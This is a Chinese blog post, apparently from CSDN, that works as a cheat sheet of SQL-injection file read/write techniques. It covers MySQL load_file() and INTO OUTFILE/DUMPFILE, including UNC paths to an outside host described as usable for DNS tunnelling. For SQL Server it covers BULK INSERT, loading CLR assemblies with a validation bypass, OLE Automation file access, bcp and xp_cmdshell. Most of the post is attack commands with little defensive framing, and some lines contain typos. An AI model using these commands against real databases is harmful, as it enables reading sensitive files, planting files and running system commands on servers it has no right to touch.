.bcp文件解析为mysql_分析SQL注入中的文件读写总结

本文介绍了SQL注入中针对文件读写的攻击手法,包括MySQL的load_file()函数读写文件,SQL Server的BULK INSERT、CLR集成及Script.FileSystemObject进行文件操作,以及Oracle的相关限制。详细分析了各种数据库系统下的文件读写方法和技术。
摘要由CSDN通过智能技术生成

SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。

一、MySQL

读文件

常见的读文件,可以用16进制代替字符串

select load_file('c:/boot.ini')

select load_file(0x633a2f626f6f742e696e69)

select load_file('//ecma.io/1.txt')       # smb协议

select load_file('\\\\ecma.io\\1.txt')    # 可用于DNS隧道

写文件

我暂时已知l两种写文件的方式

select 0x313233 into outfile 'D:/1.txt'

select 0x313233 into dumpfile 'D:/1.txt'

二、 SQL Server

读文件

1. BULK INSERT

create table result(res varchar(8000));

bulk insert result from 'd:/1.txt';

2. CLR集成

// 开启CLR集成

exec sp_configure 'show advanced options',1;

reconfigure;

exec sp_configure 'clr enabled',1

reconfigure

create assembly sqb from 'd:\1.exe' with permission_set=unsafe

上面一句可以利用create assembly函数从远程服务器加载任何.NET二进制文件到数据库中;但是他会验证是否为合法.NET程序,导致失败,下面是读取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过,首先加载一个有效的.NET的二进制文件,然后追加文件即可,下面是绕过方法。

create assembly sqb from 'd:\net.exe';

alter assembly sqb add file from 'd:\1.txt'

alter assembly sqb add file from 'd:\notnet.exe'

3. Script.FileSystemObject

# 开启Ole Automation Procedures

sp_configure 'show advanced options',1;

RECONFIGURE;

sp_configure 'Ole Automation Procedures',1;

RECONFIGURE;

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_oacreate 'scripting.filesystemobject',@o out

exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1

exec @ret = sp_onmethod @f, 'readline', @line out

while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

写文件

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_oacreate 'scripting.filesystemobject',@o out

exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1

exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. BCP复制文件(测试失败,无bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

三、Oracle

pass,Oracle太坑了~~~几乎都受到PL/SQL的限制,暂时不讨论

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值